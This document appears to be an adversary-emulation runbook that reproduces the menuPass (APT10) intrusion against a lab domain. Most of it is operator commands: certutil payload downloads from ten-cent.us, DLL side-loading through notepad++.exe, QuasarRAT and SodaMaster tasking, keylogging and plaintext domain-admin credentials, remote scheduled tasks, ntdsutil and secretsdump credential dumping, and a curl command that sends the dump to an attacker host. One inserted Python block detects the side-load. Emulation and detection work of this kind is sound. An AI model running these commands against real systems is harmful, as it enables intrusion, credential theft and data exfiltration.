# menuPass Scenario Overview

## Step 0 - Operator Setup

### ☣️ Procedures
Initiate an RDP session to the Windows jumpbox `homelander (116.83.1.29)`.

Search for Command Prompt and right-click Run As Administrator. Execute the following command to start the Quasar C2 server:

```cmd
C:\menu_pass\Resources\Quasar\bin\Release\net472\Quasar.exe -c C:\menu_pass\Resources\Quasar\quasar.p12
```

➡️ Initiate an RDP session to the Kali attack host `kraken (176.59.1.18)`.

In a new terminal window, start the evalsC2server, ensuring the following handlers are enabled:

- QuasarRAT
- SodaMaster
- Simple file server

```bash
cd menu_pass/Resources/control_server
sudo go build -o controlServer main.go
sudo ./controlServer -c config/msr2_handler_config.yml
```

Right-click within the terminal window and click "Split Terminal Horizontally". Within the new terminal, change directory to the location of `evalsC2client.py` and use this terminal for tasking implants.

```bash
cd menu_pass/Resources/control_server
```
## Step 1 - Establish Persistence

### 🎤 Voice Track

menuPass gains initial access via stolen credentials with local administrative privileges. These credentials allow the adversary to access the Microsoft Internet Information Services (IIS) web server `gabumon (10.10.10.9)` in Subsidiary A's environment via RDP.

After establishing access on the IIS server `gabumon (10.10.10.9)`, menuPass downloads SigLoader, its components, and the encrypted QuasarRAT module on the victim device using `certutil`. SigLoader is a multi-layer loader that loads and decrypts the target payload. Eventually, SigLoader will load the first payload, FYAnti, in memory.

FYAnti decrypts the first embedded .NET module and executes the module using the `CppHostCLR` technique to avoid dropping additional files to disk. When executed, the first embedded .NET module then enumerates files to find the QuasarRAT .NET module on disk, decrypts it, and then executes it.

QuasarRAT, which has been modified and heavily obfuscated, first checks for internet connectivity, then connects to the C2 server using a redirector at `notepad-plusplus-updates[.]com (121.93.4.32)`.
### ☣️ Procedures

From the Windows jumpbox `homelander (116.83.1.29)`, using the provided stolen system credentials, RDP to the IIS Server `gabumon (10.10.10.9)`.

Open Command Prompt with administrative privileges.

Execute `certutil` to download SigLoader and FYAnti components:

```cmd
certutil.exe -urlcache -f http://ten-cent.us/files/VERSION.dll "C:\Program Files\Notepad++\VERSION.dll"
certutil.exe -urlcache -f http://ten-cent.us/files/skt.dll %SYSTEMROOT%\System32\skt.dll
certutil.exe -urlcache -f http://ten-cent.us/files/mshtml.wpf.wfx %SYSTEMROOT%\Microsoft.NET\mshtml.wpf.wfx
certutil.exe -urlcache -f http://ten-cent.us/files/ngen.old2.log %SYSTEMROOT%\Microsoft.NET\Framework64\v4.0.30319\ngen.old2.log
```

- Note:
  - `VERSION.dll` is a symbolic link to menu_pass/Resources/payloads/sigloader/IIS_layer1.dll
  - `skt.dll` is a symbolic link to menu_pass/Resources/payloads/sigloader/IIS_layer2.dll
  - `mshtml.wpf.wfx` is a symbolic link to menu_pass/Resources/payloads/sigloader/IIS_fyanti.dll
  - `ngen.old2.log` is a symbolic link to menu_pass/Resources/payloads/sigloader/Client.exe.enc

Execute notepad++.exe to perform DLL sideloading. SigLoader will load FYAnti and FYAnti will load QuasarRAT.

```cmd
"C:\Program Files\Notepad++\notepad++.exe"
```

- NOTE: the current working directory should be `C:\Windows\System32`. This is where the `Quasarclientmanagement.log` will be dropped.

Confirm C2 registration of QuasarRAT.

Minimize Notepad++ and close out of all other windows, then disconnect from the RDP session (do not sign out).
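A detection for the side-load described in this step (and repeated on the domain controller and bastion host later in the plan), added here as an example and not taken from the emulation plan: it flags a system DLL name such as VERSION.dll being resolved from the host application's own directory, and an unsigned second-stage DLL such as skt.dll being mapped out of System32. It assumes Sysmon-style image-load records; the `SYSTEM_DLL_NAMES` list and the sample events are constructed.

```python
"""Detect the DLL side-load described in Step 1 (repeated in Steps 4 and 6):
notepad++.exe resolving VERSION.dll from its own install directory instead of
from %SYSTEMROOT%\\System32, and an unsigned second-stage DLL (skt.dll) being
mapped out of System32. Constructed Sysmon Event ID 7 (Image loaded) style
records are used as input; this is not part of the emulation plan."""
from __future__ import annotations

from dataclasses import dataclass
from pathlib import PureWindowsPath

# System DLL names that side-loaders commonly impersonate. Assumption: a real
# deployment would derive this list from a clean reference host's System32.
SYSTEM_DLL_NAMES = {
    "version.dll", "dbghelp.dll", "wtsapi32.dll", "cryptbase.dll",
    "userenv.dll", "winhttp.dll", "profapi.dll", "msimg32.dll",
}
# Directories from which Windows itself serves those DLLs.
TRUSTED_DLL_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


@dataclass(frozen=True)
class ImageLoad:
    host: str
    process_image: str   # Sysmon "Image": the process performing the load
    image_loaded: str    # Sysmon "ImageLoaded": full path of the mapped DLL
    signed: bool         # True when Sysmon reports SignatureStatus=Valid


@dataclass(frozen=True)
class Finding:
    host: str
    process_image: str
    image_loaded: str
    reason: str


def classify(ev: ImageLoad) -> Finding | None:
    """Return a Finding for a suspicious load, or None for a benign one."""
    dll = PureWindowsPath(ev.image_loaded)
    dll_dir = str(dll.parent).lower()

    if dll_dir in TRUSTED_DLL_DIRS:
        # Layer-2 pattern (skt.dll, nhi.dll, hkp.dll in this plan): a dropped,
        # unsigned DLL sitting among the genuine system DLLs.
        if ev.signed:
            return None
        return Finding(ev.host, ev.process_image, ev.image_loaded,
                       "unsigned DLL loaded from a system directory")

    if dll.name.lower() not in SYSTEM_DLL_NAMES:
        return None  # an application's own DLL; out of scope for this rule

    proc_dir = str(PureWindowsPath(ev.process_image).parent).lower()
    if dll_dir == proc_dir:
        # Layer-1 pattern: the search-order hijack itself. For names that are
        # not KnownDLLs the application directory is searched before System32.
        reason = "system DLL name resolved from the host application's own directory"
    else:
        reason = "system DLL name loaded from a non-system directory"
    if not ev.signed:
        reason += "; DLL is unsigned"
    return Finding(ev.host, ev.process_image, ev.image_loaded, reason)


def find_sideloads(events: list[ImageLoad]) -> list[Finding]:
    return [f for f in map(classify, events) if f is not None]


# Constructed records modelled on the Step 1 and Step 4 side-loads of this plan.
SAMPLE_EVENTS = [
    ImageLoad("gabumon", r"C:\Program Files\Notepad++\notepad++.exe",
              r"C:\Program Files\Notepad++\VERSION.dll", signed=False),
    ImageLoad("gabumon", r"C:\Program Files\Notepad++\notepad++.exe",
              r"C:\Windows\System32\dbghelp.dll", signed=True),          # benign
    ImageLoad("gabumon", r"C:\Program Files\Notepad++\notepad++.exe",
              r"C:\Program Files\Notepad++\SciLexer.dll", signed=True),  # app's own
    ImageLoad("gabumon", r"C:\Program Files\Notepad++\notepad++.exe",
              r"C:\Windows\System32\skt.dll", signed=False),             # layer 2
    ImageLoad("parrotmon", r"C:\Program Files\Notepad++\notepad++.exe",
              r"C:\Program Files\Notepad++\VERSION.dll", signed=False),
]

if __name__ == "__main__":
    for f in find_sideloads(SAMPLE_EVENTS):
        print(f"{f.host}: {f.process_image} -> {f.image_loaded} ({f.reason})")
```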
### 🔍 Reference Code & Reporting

- https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/
- http://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf
- https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf
- https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage
- https://www.trendmicro.com/ja_jp/research/21/l/Sigloader-by-Earth-Tengshe.html
- https://www.lac.co.jp/lacwatch/report/20201201_002363.html
## Step 2 - Initial Discovery

### 🎤 Voice Track

After establishing communications with the C2 server, menuPass will use QuasarRAT to execute scripted discovery actions and discover the presence of a domain controller on Subsidiary A’s network.
### ☣️ Procedures

Using QuasarRAT, download the PowerShell discovery script to the IIS Server:

```bash
./evalsC2client.py --set-task F5B06FACBDB06686ABA3E958BE433EF5 '{"type": 2, "transfer_src": "C:\\menu_pass\\Resources\\payloads\\quasar\\step2discovery.ps1", "transfer_dst": "C:\\Users\\kizumi\\AppData\\Local\\Temp\\ekR9TmrCQa1Q.ps1"}'
```

Using QuasarRAT, execute the PowerShell discovery script:

```bash
./evalsC2client.py --set-task F5B06FACBDB06686ABA3E958BE433EF5 '{"type": 1, "proc_path":"powershell.exe", "proc_args": "\"C:\\Users\\kizumi\\AppData\\Local\\Temp\\ekR9TmrCQa1Q.ps1\""}'
```
### 🔍 Reference Code & Reporting

- https://blogs.blackberry.com/en/2019/06/threat-spotlight-menupass-quasarrat-backdoor
- https://medium.com/cycraft/supply-chain-attack-targeting-taiwan-financial-sector-bae2f0962934
- https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/
- https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
- https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf
- https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-
- https://web.archive.org/web/20191028183408/https://blog.ensilo.com/uncovering-new-activity-by-apt10
## Step 3 - Credential Access and Privilege Escalation

### 🎤 Voice Track

Eventually, the IIS Server admin logs in to the IIS Server `gabumon (10.10.10.9)`. While performing tasks, they eventually need to type in their Domain Admin credentials. Using QuasarRAT's keylogger utility, menuPass captures the domain admin credentials.

menuPass initiates a new RDP to the IIS server `gabumon (10.10.10.9)` using the compromised credentials from Step 1.

Using the RDP to the IIS Server `gabumon (10.10.10.9)`, menuPass opens PowerShell with administrative privileges and authenticates using the domain admin's credentials.
### ☣️ Procedures

⏩ Emulate the following legitimate user activity:

➡️ Initiate an RDP session from the jumpbox `homelander (176.59.17.22)` to `gabumon (10.10.10.9)` as the IIS Admin.

Open Command Prompt with administrative privileges, execute cmd via `runas` with their Domain Admin username, typing the password when prompted:

```cmd
runas /user:DIGIRUNAWAY\kizumi.da cmd
```

Type, DO NOT copy and paste, the following when prompted:

```
ydJEeqNzN4Xqkd9h@
```

Close the Command Prompts then disconnect from the RDP when finished. You should return to `homelander (116.83.1.29)`.

⏩ Resume red team activity

Using the first QuasarRAT on the IIS server `gabumon (10.10.10.9)`, retrieve keylogs:

```bash
./evalsC2client.py --set-task F5B06FACBDB06686ABA3E958BE433EF5 '{"type": 4}'
```

Initiate a new RDP to the IIS server `gabumon (10.10.10.9)` using the stolen credentials from Step 1.

Within the RDP to the IIS server `gabumon (10.10.10.9)`, open Command Prompt with administrative privileges (if not already open) then execute the following runas command, entering the kizumi.da password when prompted:

```cmd
runas /netonly /user:DIGIRUNAWAY\kizumi.da cmd.exe
```
### 🔍 Reference Code & Reporting

- https://blogs.blackberry.com/en/2019/06/threat-spotlight-menupass-quasarrat-backdoor
- https://medium.com/cycraft/supply-chain-attack-targeting-taiwan-financial-sector-bae2f0962934
- https://web.archive.org/web/20191028183408/https://blog.ensilo.com/uncovering-new-activity-by-apt10
- https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/
- https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
- https://www.trendmicro.com/ja_jp/research/21/l/Sigloader-by-Earth-Tengshe.html
- https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf
- https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-
## Step 4 - Lateral Movement to Subsidiary A Domain Controller

### 🎤 Voice Track

Using the first QuasarRAT implant, menuPass downloads a second copy of SigLoader/QuasarRAT to the IIS Server `gabumon (10.10.10.9)`, then uses the elevated Command Prompt to move the executable to the Subsidiary A Domain Controller `parrotmon (10.10.10.4)`.

Using the elevated Command Prompt, menuPass uses the `schtasks` utility to remotely create and run a scheduled task on the Subsidiary A Domain Controller `parrotmon (10.10.10.4)` that executes a legitimate executable: `Notepad++.exe`.

This legitimate executable executes SigLoader via DLL side-loading and results in a second QuasarRAT implant on the Subsidiary A Domain Controller `parrotmon (10.10.10.4)`.

This second QuasarRAT implant will connect to the C2 server using a redirector at `notepad-plusplus-updates[.]eu (121.93.99.100)`.
### ☣️ Procedures

Using the QuasarRAT on the IIS Server `gabumon (10.10.10.9)`, download a second copy of SigLoader/QuasarRAT components. Wait until each command has returned before executing the next.

SigLoader layer 1:

```bash
./evalsC2client.py --set-task F5B06FACBDB06686ABA3E958BE433EF5 '{"type": 2, "transfer_src": "C:\\menu_pass\\Resources\\payloads\\quasar\\DC_layer1.dll", "transfer_dst": "C:\\Users\\kizumi\\AppData\\Local\\Temp\\VERSION.dll"}'
```

SigLoader layer 2:

```bash
./evalsC2client.py --set-task F5B06FACBDB06686ABA3E958BE433EF5 '{"type": 2, "transfer_src": "C:\\menu_pass\\Resources\\payloads\\quasar\\DC_layer2.dll", "transfer_dst": "C:\\Users\\kizumi\\AppData\\Local\\Temp\\nhi.dll"}'
```

FYAnti:

```bash
./evalsC2client.py --set-task F5B06FACBDB06686ABA3E958BE433EF5 '{"type": 2, "transfer_src": "C:\\menu_pass\\Resources\\payloads\\quasar\\DC_fyanti.dll", "transfer_dst": "C:\\Users\\kizumi\\AppData\\Local\\Temp\\mshtmled.wpf.cfg"}'
```

QuasarRAT:

```bash
./evalsC2client.py --set-task F5B06FACBDB06686ABA3E958BE433EF5 '{"type": 2, "transfer_src": "C:\\menu_pass\\Resources\\payloads\\quasar\\Client.exe.enc", "transfer_dst": "C:\\Users\\kizumi\\AppData\\Local\\Temp\\ngen.old3.log"}'
```

Return to the elevated Command Prompt on the IIS server `gabumon (10.10.10.9)` and move the downloaded components to the Subsidiary A Domain Controller via SMB:

```cmd
move C:\Users\kizumi\AppData\Local\Temp\VERSION.dll "\\10.10.10.4\C$\Program Files\Notepad++\"
move C:\Users\kizumi\AppData\Local\Temp\nhi.dll \\10.10.10.4\admin$\System32
move C:\Users\kizumi\AppData\Local\Temp\mshtmled.wpf.cfg \\10.10.10.4\admin$\Microsoft.NET
move C:\Users\kizumi\AppData\Local\Temp\ngen.old3.log \\10.10.10.4\admin$\Microsoft.NET\Framework64\v4.0.30319\
```

Using the elevated Command Prompt on the IIS server `gabumon (10.10.10.9)`, remotely create a scheduled task on the Subsidiary A Domain Controller `parrotmon (10.10.10.4)` to execute a legitimate executable that sideloads SigLoader:

```cmd
schtasks /create /s 10.10.10.4 /u DIGIRUNAWAY\kizumi.da /p ydJEeqNzN4Xqkd9h@ /tn "Notepad++ Script" /tr "\"C:\Program Files\Notepad++\notepad++.exe\"" /ru DIGIRUNAWAY\kizumi.da /rp ydJEeqNzN4Xqkd9h@ /rl HIGHEST /sc MINUTE /mo 15 /f
```

Using the elevated Command Prompt on the IIS server `gabumon (10.10.10.9)`, remotely run the scheduled task created on the Subsidiary A Domain Controller `parrotmon (10.10.10.4)`:

```cmd
schtasks /run /s 10.10.10.4 /u DIGIRUNAWAY\kizumi.da /p ydJEeqNzN4Xqkd9h@ /tn "Notepad++ Script"
```

Confirm C2 registration of a second QuasarRAT implant.
### 🔍 Reference Code & Reporting

- http://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf
- https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf
- https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
## Step 5 - Credential Access and Discovery

### 🎤 Voice Track

After gaining access on the Subsidiary A Domain Controller `parrotmon (10.10.10.4)`, menuPass uses the QuasarRAT implant on the Subsidiary A Domain Controller `parrotmon (10.10.10.4)` to execute the native `ntdsutil.exe` utility to export the Active Directory database to `ntds.dit`. Then, menuPass uses QuasarRAT to exfiltrate the generated `ntds.dit` and `SYSTEM` hive files, then dumps credentials offline to retrieve hashes of authenticated users. These hashes are cracked offline to retrieve plaintext passwords for the domain users.

menuPass then performs an internal port scan to search for open RDP and SMB ports on the network. A reverse nslookup is then performed against the active IP addresses to resolve the hostnames.
### ☣️ Procedures

Using the QuasarRAT implant on the Subsidiary A Domain Controller `parrotmon (10.10.10.4)`, execute `whoami` to get the user SID of kizumi.da:

```bash
./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"whoami.exe", "proc_args": "/all"}'
```

Using the QuasarRAT implant on the Subsidiary A Domain Controller `parrotmon (10.10.10.4)`, create folder `$RCXNYCG` in kizumi.da's Recycle Bin (`C:\$Recycle.Bin\S-1-5-21-156812349-472333277-3174882868-1109\$RCXNYCG`):

```bash
./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"cmd.exe", "proc_args": "/c mkdir C:\\$Recycle.Bin\\S-1-5-21-156812349-472333277-3174882868-1109\\$RCXNYCG"}'
```

Using the QuasarRAT implant on the Subsidiary A Domain Controller `parrotmon (10.10.10.4)`, execute `ntdsutil.exe` to generate `ntds.dit`:

```bash
./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"ntdsutil.exe", "proc_args": "\"ac i ntds\" \"i\" \"c f C:\\$Recycle.Bin\\S-1-5-21-156812349-472333277-3174882868-1109\\$RCXNYCG\" q q"}'
```

Using the QuasarRAT implant on the Subsidiary A Domain Controller `parrotmon (10.10.10.4)`, exfiltrate the generated `ntds.dit` file:

```bash
./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 3, "transfer_src": "C:\\$Recycle.Bin\\S-1-5-21-156812349-472333277-3174882868-1109\\$RCXNYCG\\Active Directory\\ntds.dit", "transfer_dst": "ntds.dit"}'
```

Using the QuasarRAT implant on the Subsidiary A Domain Controller `parrotmon (10.10.10.4)`, exfiltrate the generated `SYSTEM` file:

```bash
./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 3, "transfer_src": "C:\\$Recycle.Bin\\S-1-5-21-156812349-472333277-3174882868-1109\\$RCXNYCG\\registry\\SYSTEM", "transfer_dst": "SYSTEM"}'
```

Using impacket, locally dump credentials to retrieve hashes of authenticated users, and validate that the NTLM hash of kizumi.da is contained in the output:

```bash
impacket-secretsdump -system files/SYSTEM -ntds files/ntds.dit local | grep 6265fbabbdaa3ee71df61bd9f3c77d68
```

Using the QuasarRAT implant on the Subsidiary A Domain Controller `parrotmon (10.10.10.4)`, port scan the workstations of the Subsidiary A network:

```bash
./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 5, "range": "10.10.20.0/24", "ports":[22, 53, 80, 445, 3389], "timeout": 300}'
```

Using the QuasarRAT implant on the Subsidiary A Domain Controller `parrotmon (10.10.10.4)`, execute nslookup against the active hosts. Wait until each command has returned before executing the next.

phantomon:

```bash
./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"nslookup.exe", "proc_args": "10.10.20.11"}'
```

ghostmon:

```bash
./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"nslookup.exe", "proc_args": "10.10.20.22"}'
```

cecilmon:

```bash
./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"nslookup.exe", "proc_args": "10.10.20.23"}'
```
### 🔍 Reference Code & Reporting

- http://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf
- https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf
- https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
## Step 6 - Preparation for Lateral Movement onto Subsidiary B Network

### 🎤 Voice Track

menuPass performs additional Active Directory enumeration, through which the following are identified:

- A trusted domain DIGIREVENGE
- A bastion workstation `kimeramon (10.20.20.11)` in DIGIREVENGE allowing authentication for Subsidiary A users
- Hosts and users within DIGIREVENGE

Using the QuasarRAT implant on the Subsidiary A Domain Controller `parrotmon (10.10.10.4)`, menuPass downloads SigLoader and its necessary components to the Subsidiary A Domain Controller, then moves them to the bastion workstation `kimeramon (10.20.20.11)`.

Using the QuasarRAT implant on the Subsidiary A Domain Controller `parrotmon (10.10.10.4)`, menuPass then remotely creates a service on the bastion workstation `kimeramon (10.20.20.11)` to execute a legitimate binary that will sideload SigLoader.
### ☣️ Procedures

Using the QuasarRAT implant on the Subsidiary A Domain Controller `parrotmon (10.10.10.4)`, execute `dsquery` to enumerate further information on the active hosts:

```bash
./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"dsquery.exe", "proc_args": "* -filter \"(objectCategory=computer)\" -attr *"}'
```

Using the QuasarRAT implant on the Subsidiary A Domain Controller `parrotmon (10.10.10.4)`, execute `dsquery` to enumerate further information on trusted domains:

```bash
./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"dsquery.exe", "proc_args": "* -filter \"(objectCategory=trusteddomain)\" -attr *"}'
```

- Ensure `DIGIREVENGE` is listed as a trusted domain:

  ```bash
  grep 'flatname: digirevenge' logs.txt -ia -C 10
  ```

Using the QuasarRAT implant on the Subsidiary A Domain Controller `parrotmon (10.10.10.4)`, execute `dsquery` to enumerate further information on the active hosts within DIGIREVENGE:

```bash
./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"dsquery.exe", "proc_args": "* -filter \"(objectCategory=computer)\" -domain DIGIREVENGE -attr *"}'
```

- Ensure `kimeramon (10.20.20.11)` is listed in the output:

  ```bash
  grep 'Workstation Contractor Bastion' logs.txt -ia
  ```

Using the QuasarRAT implant on the Subsidiary A Domain Controller `parrotmon (10.10.10.4)`, execute `dsquery` to enumerate further information on the users within DIGIREVENGE:

```bash
./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"dsquery.exe", "proc_args": "* -filter \"(&(objectclass=User)(objectCategory=Person))\" -domain DIGIREVENGE -attr *"}'
```

Using the QuasarRAT implant on the Subsidiary A Domain Controller `parrotmon (10.10.10.4)`, download SigLoader and its necessary components (SodaMaster version) and move them to the bastion workstation `kimeramon (10.20.20.11)`. Wait until each command has returned before executing the next.

SigLoader layer 1:

```bash
./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 2, "transfer_src": "C:\\menu_pass\\Resources\\payloads\\quasar\\bastion_layer1.dll", "transfer_dst": "\\\\kimeramon.digirevenge.net\\C$\\Program Files\\Notepad++\\VERSION.dll"}'
```

SigLoader layer 2:

```bash
./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 2, "transfer_src": "C:\\menu_pass\\Resources\\payloads\\quasar\\bastion_layer2.dll", "transfer_dst": "\\\\kimeramon.digirevenge.net\\admin$\\System32\\hkp.dll"}'
```

SodaMaster:

```bash
./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 2, "transfer_src": "C:\\menu_pass\\Resources\\payloads\\quasar\\sodamaster.dll", "transfer_dst": "\\\\kimeramon.digirevenge.net\\admin$\\System32\\win64_tools.dll"}'
```

Using the QuasarRAT implant on the Subsidiary A Domain Controller `parrotmon (10.10.10.4)`, remotely create a service on the bastion workstation `kimeramon (10.20.20.11)` to execute a legitimate binary that will sideload SigLoader:

```bash
./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"seq": 1, "type": 1, "proc_path": "sc.exe", "proc_args": "\\\\kimeramon.digirevenge.net create Notepad binpath= \"cmd /c \\\"C:\\Program Files\\Notepad++\\notepad++.exe\\\"\" error= ignore start= demand"}'
```
### 🔍 Reference Code & Reporting

- https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/
- http://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf
- https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf
- https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
- https://www.trendmicro.com/ja_jp/research/21/l/Sigloader-by-Earth-Tengshe.html
- https://www.lac.co.jp/lacwatch/report/20201201_002363.html
- https://www.macnica.co.jp/business/security/manufacturers/files/mpressioncss_ta_report_2020_5_en.pdf
## Step 7 - Lateral Movement onto Subsidiary B Network

### 🎤 Voice Track

Using the QuasarRAT implant on the Subsidiary A Domain Controller `parrotmon (10.10.10.4)`, menuPass remotely executes the created service on the bastion workstation `kimeramon (10.20.20.11)` to execute a legitimate binary that will sideload SigLoader.

On execution, SigLoader will again perform its layered loading, with the final loaded payload this time being SodaMaster. Once SodaMaster is executed, it will perform the following initialization steps:

- Perform automated host discovery
- Execute anti-sandbox checks
- Add itself to Windows Defender's whitelist
- Check Defender configurations
- Establish C2 communication using a redirector at `notepad-plusplus[.]eu (121.93.44.121)`

Eventually, a file server administrator `kmimi` from Subsidiary B's network RDPs in to the bastion workstation `kimeramon (10.20.20.11)` to perform tasks, then disconnects from their session when complete.
### ☣️ Procedures

Using the QuasarRAT implant on the Domain Controller, remotely execute the created service:

```bash
./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"seq": 1, "type": 1, "proc_path": "sc.exe", "proc_args": "\\\\kimeramon.digirevenge.net start Notepad"}'
```

- This command should return `FAILED 1053`. This is expected because notepad++.exe is not configured as a service binary that would properly respond to the service manager. However, notepad++.exe will still execute and should remain running even after the command returns the failed message.

Confirm C2 registration of SodaMaster.

⏩ Emulate the following legitimate user activity:

➡️ Initiate an RDP session from the jumpbox `homelander (176.59.17.22)` to `kimeramon (10.20.20.11)` as the file server administrator.

Open Command Prompt, mount the file share:

```cmd
net use F: \\10.20.10.23\F$ /persistent:yes
```

Check the drive was mounted properly:

```cmd
net use
```

Disconnect from RDP and you should return to `homelander (176.59.17.22)`.

⏩ Resume red team activity
### 🔍 Reference Code & Reporting

- https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/
- http://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf
- https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf
- https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
- https://www.trendmicro.com/ja_jp/research/21/l/Sigloader-by-Earth-Tengshe.html
- https://www.lac.co.jp/lacwatch/report/20201201_002363.html
- https://www.macnica.co.jp/business/security/manufacturers/files/mpressioncss_ta_report_2020_5_en.pdf
## Step 8 - Discovery and Additional Privilege Escalation

### 🎤 Voice Track

menuPass uses SodaMaster to execute discovery actions, which will result in menuPass discovering a file server `alphamon (10.20.10.23)` and its administrator `kmimi` on Subsidiary B's network. SodaMaster creates threads for executing downloaded shellcode in memory.

To prepare to laterally move onto the file server, menuPass uses SodaMaster to download `secretsdump.exe`, which is Impacket's `secretsdump.py` converted to an executable binary using PyInstaller. SodaMaster executes `secretsdump.exe` to dump the SYSTEM/SECURITY/SAM hives on the bastion workstation `kimeramon (10.20.20.11)`, authenticating using the NTLM hash for `kizumi.da` collected previously.

The retrieved dump contains a cached domain login for `kmimi`, the file server administrator in Subsidiary B, which is cracked to reveal `kmimi`'s plaintext password.
### ☣️ Procedures

Using SodaMaster, execute the discovery actions shellcode. Wait until each command has returned before executing the next.

`netstat -anop tcp`:

```bash
./evalsC2client.py --set-task 2ef436e5400781c2f6611c31d4ef79b8 '{"id":"s", "args":"netstat -anop tcp"}'
```

- ❗ Verify a network connection to `alphamon (10.20.10.23)` port 445

`tasklist /v`:

```bash
./evalsC2client.py --set-task 2ef436e5400781c2f6611c31d4ef79b8 '{"id":"s", "args":"tasklist /v"}'
```

- ❗ Verify that the enumerated processes output contains a process running under `kmimi`

`net view 10.20.10.23 /all`:

```bash
./evalsC2client.py --set-task 2ef436e5400781c2f6611c31d4ef79b8 '{"id":"s", "args":"net view 10.20.10.23 /all"}'
```

- ❗ Verify the output contains a list of file shares with the file server host `alphamon (10.20.10.23)`

`net user kmimi /domain`:

```bash
./evalsC2client.py --set-task 2ef436e5400781c2f6611c31d4ef79b8 '{"id":"s", "args":"net user kmimi /domain"}'
```

- ❗ Verify that `File Server Admins` is listed as one of the groups that `kmimi` is a member of

Using SodaMaster, download and execute `secretsdump.exe`, using the NTLM hash for `kizumi.da` collected in step 5:

```bash
./evalsC2client.py --set-task 2ef436e5400781c2f6611c31d4ef79b8 '{"id":"s", "payload":"secretsdump.exe", "payloadPath":"C:/Windows/Temp", "args":"C:/Windows/Temp/secretsdump.exe digirunaway/kizumi.da@127.0.0.1 -hashes :6265fbabbdaa3ee71df61bd9f3c77d68 > C:/Windows/Temp/tmp4541 && echo Done"}'
```

Using SodaMaster, curl the secretsdump output to exfiltrate the file:

```bash
./evalsC2client.py --set-task 2ef436e5400781c2f6611c31d4ef79b8 '{"id":"s", "args":"curl -X POST -H 'filename:sdump.txt' --data-binary @C:/Windows/Temp/tmp4541 http://ten-cent.us/uploads"}'
```

Confirm the secretsdump output file was exfiltrated in the C2 server log, then check for the presence of a cached domain login for `kmimi` in the output:

```bash
cat files/sdump.txt | grep -a kmimi
```

ℹ️ This hash is cracked to retrieve the plaintext password for `kmimi`.
### 🔍 Reference Code & Reporting

- https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/
- http://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf
- https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
- https://www.trendmicro.com/ja_jp/research/21/l/Sigloader-by-Earth-Tengshe.html
